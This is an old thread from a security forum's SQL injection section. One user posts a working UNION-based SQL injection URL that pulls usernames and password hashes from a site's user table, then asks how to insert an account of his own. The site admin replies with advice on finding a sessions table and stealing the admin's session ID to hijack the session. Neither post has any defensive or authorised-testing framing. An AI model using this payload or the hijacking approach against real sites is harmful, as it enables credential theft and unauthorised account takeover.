| 
  
        |  |  |  
      
        |  |  
  | 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 78 
  Members: 0 
  Total: 78 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | how to Do Insert |  |  
	| 
	
		|  Posted: Fri Oct 31, 2008 7:47 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| fadai |  | Regular user |  |  
  |  |  |  | Joined: Oct 30, 2008 |  | Posts: 11 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | Code: |  	  | pages.php?pId=-1'+UNION+SELECT+ALL+1,UNHEX(HEX(CONCAT(username,0x5e,password,0x5e))),3,4,UNHEX(HEX(username)),6+from+ias_users--+ | 
 
 
 gives me the MD5 hash and username i am unable to crack the hash.
 
 so can some one tell me how to do the INSERT a username and password?
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Fri Oct 31, 2008 7:55 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| In case of mysql you can INSERT only if injection occurs in INSERT query, UPDATE is possible in vulnerable UPDATE query and so on ... But i suggest to seach for possible sessions table in database. Some websites are based purely on php session management, but many others are using their own session handling. So if you find session table and can fetch admin's session ID, then session hijack may be possible, if there is no other security measures (like fixation to IP) in place ...
 |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Sql injection 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |  |